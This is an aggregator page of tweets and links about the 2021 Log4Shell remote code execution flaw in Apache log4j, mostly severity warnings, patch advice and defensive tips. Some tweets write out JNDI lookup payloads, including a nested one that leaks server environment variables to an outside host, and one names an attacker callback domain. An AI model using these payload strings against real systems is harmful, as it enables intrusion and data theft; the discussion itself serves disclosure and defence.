/
Navigation
Chronicles
Browse all articles
Explore
Semantic exploration
Research
Entity momentum
Nexus
Correlations & relationships
Story Arc
Topic evolution
Drift Map
Semantic trajectory animation
Posts
Analysis & commentary
Pulse API
Tech news intelligence API
Browse
Entities
Companies, people, products, technologies
Domains
Browse by publication source
Handles
Browse by social media handle
Detection
Concept Search
Semantic similarity search
High Impact Stories
Top coverage by position
Sentiment Analysis
Positive/negative coverage
Anomaly Detection
Unusual coverage patterns
Analysis
Rivalry Report
Compare two entities head-to-head
Semantic Pivots
Narrative discontinuities
Crisis Response
Event recovery patterns
Connected
Search: /
Command: ⌘K
Embeddings: large
TEXXR
TEXXR

Chronicles

The story behind the story

days · browse · Enter similar · o open

A vulnerability in the Apache log4j Java logging library allows for remote code execution, impacting Steam, iCloud, Minecraft, and other services

A few hours ago, a -day exploit in the popular Java logging library, log4j, was tweeted along with a POC posted on GitHub that results …

LunaSec Blog

Related Coverage

Discussion

  • reddit reddit on reddit
    RCE 0-day exploit found in log4j, a popular Java logging package
  • @_staticflow_ Tanner Barnes on x
    In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.co m/ a} Will leak server side env vars!
  • @yazicivo @yazicivo on x
    Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. htt…
  • @malwaretechblog Marcus Hutchins on x
    This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
  • @nsa_csdirector Rob Joyce on x
    The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA's GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure. https://arstechnica.com/.…
  • @secbro1 SecBro on x
    https://twitter.com/...
  • @kikta @kikta on x
    Gonna be one of those weekends https://twitter.com/...
  • @cyb3rops @cyb3rops on x
    How to test your apps for #log4shell vulnerability 1. Generate a DNS token https://canarytokens.org/... 2. Wrap that token in Prefix: ${jndi:ldap:// Suffix: /a} 3. Use that value in search forms, profile data, settings etc. of your apps 4. Get notified when you triggered a reacti…
  • @tarah Tarah M. Wheeler on x
    Months from now, I don't want to hear that a major consumer financial institution failed to patch this five alarm CVE Apache vulnerability. I'm tired of opening emails that start with “we take your privacy and security very seriously.” https://twitter.com/...
  • @certnz Cert Nz on x
    CERT NZ has released an advisory on a Java vulnerability. Reports from online users show that this is being actively exploited and that proof-of-concept code has been published. https://www.cert.govt.nz/...
  • @weldpond Chris Wysopal on x
    The patched version of log4j 2.15.0 requires a minimum of Java 8. If you are on Java 7 you will need to upgrade to Java8 When there is active exploitation and you need to patch fast it is beneficial if you have been updating your other dependencies over time.
  • @campuscodi Catalin Cimpanu on x
    I have a feeling I'll be doing follow-up breach stories related to that log4j bug 'til Easter
  • @eastdakota @eastdakota on x
    Patch your systems. #Log4J is being actively exploited. https://twitter.com/...
  • @erratarob @erratarob on x
    🚨🚨🚨🚨 🚨🚨🚨🚨 🚨🚨🚨🚨 If there were an Internet threat level where your organization needs to panic, this is it. Your org needs to deal with the log4j problem. 🚨🚨🚨🚨 🚨🚨🚨🚨 🚨🚨🚨🚨
  • @briannawu Brianna Wu on x
    Not sure why a logging app needs code execution. In either case, this is extremely serious. Thinking of all my infosec friends who will be working all weekend. https://twitter.com/...
  • @uscert_gov Us-Cert on x
    Upgrade ASAP to protect yourself from the #RCE vulnerability, CVE-2021-44228, affecting Apache Log4j. Read more at https://www.cisa.gov/... #ZeroDay #Cybersecurity #InfoSec
  • @erratarob @erratarob on x
    Step #1: get a list of all your products exposed to the Internet that use Java. Step #2: call support for each and every one and ask the vendor. Vendors who don't have a canned answer are bad vendors who should not be trusted in the future. https://twitter.com/...
  • @eastdakota @eastdakota on x
    The #Log4J vulnerability is the worst Internet-wide vulnerability since #Shellshock. @Cloudflare has updated our WAF and Zero Trust solutions to protect our customers. https://blog.cloudflare.com/ ...
  • @tgockel Travis Gockel on x
    Today's log4j vulnerability's root cause was described by @pwntester in 2016. https://www.blackhat.com/...
  • @eastdakota @eastdakota on x
    We often talk about computer viruses. One interesting thing about #Log4J is that exploits may act more like a spore. So many different systems pass logs between them. The exploit string may act like a spore, laying dormant until it encounters a vulnerable log system.
  • @gossithedog Kevin Beaumont on x
    Targeting for Log4Shell so far seen in wild - password reset/forgot password forms, and search forms. I'm guessing orgs log and process searches and usernames in forgot password flows.
  • @_noid_ @_noid_ on x
    @kikta The amount of people saying “We use it, but those systems aren't directly accessible from the Internet” is just killing me.
  • @gossithedog Kevin Beaumont on x
    My number one take away for defenders right now is: keep calm. It's an evolving situation. No easy fix. Defence in depth is best defence: eg if you don't allow unrestricted outbound internet from webapps, you're in a good place as you need outbound traffic to exploit.
  • @swiftonsecurity @swiftonsecurity on x
    Putin thinking about all the US agencies he's gonna hack with Log4j https://twitter.com/...
  • @malwarejake Jake Williams on x
    Nothing says “brace for impact” on a vulnerability like coin miners being deployed. This is bottom feeder activity, consider it like a low water mark. https://twitter.com/...
  • @jacobian @jacobian on x
    📢 Folks, an extraordinarily bad RCE in log4j dropped today. If you use a JVM, your code or a dep probably uses log4j; you're vulnerable if you log user-supplied data. I know it's late but this one's bad enough it's worth starting your IR process now, or first thing tmrw. [1/2]
  • @hackinglz Justin on x
    @kikta This will take us well into January “hey do you have a software/server inventory??...sure!” “including all the dependencies??” ☠️
  • @randoriattack @randoriattack on x
    The Randori Attack Team can confirm exploitability of VMWare products in live environments (VMSA-2021-0028) via Log4j (CVE-2021-44228) aka “Log4Shell”. This is a critical vulnerability. Follow @RandoriAttack for updates: https://www.randori.com/... 1/3
  • @sans_isc Sans Isc on x
    Apache #log4j2 exploitation in full swing. PATCH NOW!! CVE-2021-44228 . 200+ exploit attempts against our honeypot so far from approx 100 sources. “bingsearchlib[.]com:39356” is particularly popular #log4j #cve202144228 #rce #0day #PATCHNOW https://twitter.com/...
  • @invalidname Chris Adamson on x
    BTW, peeps on Apple platforms, the Log4j security hole should be your reminder that if you conform to NSCoding, you really should also conform to NSSecureCoding. • https://developer.apple.com/ ... • https://nshipster.com/... https://twitter.com/...
  • @c_c_krebs Chris Krebs on x
    This one is pretty brutal based on the much smarter people I'm hearing from. Log4j is everywhere, it's trivial to exploit, & can be daisy chained thru services. The good news is Apache got a fix out fast and IT/IR teams are more & more primed for these events. The race is on... h…
  • @cybernigma @cybernigma on x
    It looks like facebook messenger (web) is vulnerable. I also got a hit through google's messages for web (SMS pairing). #log4j
  • @lunasecio LunaSec on x
    We added information about how you can test if you're vulnerable to our blog post on #Log4Shell. If you have found a better way, please let us know! https://www.lunasec.io/...
  • @gossithedog Kevin Beaumont on x
    If you already upgraded code to use just released log4j-2.15.0-rc1, it's still vulnerable - you now need to apply log4j-2.15.0-rc2 as there was a bypass. They is no stable release which fixes yet.
  • @gossithedog Kevin Beaumont on x
    There's some other pivots on this - even if you only do a DNS lookup, you can lookup, er, stuff. https://twitter.com/...
  • @getajobmike Mike Perham on x
    This log4j RCE is a great example of how software complexity can cause very bad unintended consequences. Literally every Java project in the world uses log4j. https://www.lunasec.io/...
  • @gossithedog Kevin Beaumont on x
    Starting a new thread for log4j security vulnerability and fallout. Spoiler: although this emerged as a Minecraft issue (lol) there is going to be impacts across a wide range of enterprise software for some time. https://twitter.com/...
  • @malwarebytes @malwarebytes on x
    A few hours ago, a 0-day RCE exploit was discovered in the logging library log4j. You may not have heard of it, but it's everywhere. Per @LunaSecIO: “Many, many services are vulnerable”. They include Steam, Apple iCloud, Minecraft, and others. https://www.lunasec.io/...
  • @badlionclient Badlion Client on x
    We have released a special patch today on Badlion Client across all Minecraft versions to fix an exploit recently discovered due to a 3rd party library. We will always make sure our users are safe! 🦁 For more details about this exploit see here: https://www.lunasec.io/...
  • @gossithedog Kevin Beaumont on x
    In English explainer about why Log4Shell is a big vulnerability: It's like if you locked the doors to your car, but then allowed anybody to shout commands at Siri from outside the car to remotely drive it. Log4j is buried deep inside products and orgs, gonna be painful to fix.
  • @gossithedog Kevin Beaumont on x
    Me in 2049, talking to the 18 year old entering cyber: ‘back in my day, somebody made a Minecraft video game command you type in chat, which ended up screwed up all the security controls that existed. Yes, we sucked’.
  • @reybango Rey Bango on x
    URGENT: if you're using log4j in your applications for logging, you need to update it. There's a remote code execution bug in it. GitHub labeled the vulnerability as “critical severity” https://www.vice.com/... via @vice
  • @campuscodi Catalin Cimpanu on x
    The Log4j zero-day (tracked as CVE-2021-44228, or #Log4Shell) has received an official security fix just as scans for vulnerable systems are ramping up https://therecord.media/... https://twitter.com/...
  • @campuscodi Catalin Cimpanu on x
    Let me save you a bunch of clicks: PoC: https://github.com/... Patch: https://logging.apache.org/... Technical breakdown: https://www.lunasec.io/... Systems confirmed vulnerable: https://github.com/... https://twitter.com/...
  • @jasonbcox0 Jason Cox on x
    0-day RCE vulnerability in log4j is getting exploited all over the place today. Fortunately a small config change can protect you. If you have a Java stack, stop what you're doing and read this ASAP! https://twitter.com/...
  • @uuallan @uuallan on x
    Happy Patch Friday. This is remotely executable and is being scanned for/presumably exploited in wild. You know the drill... https://twitter.com/...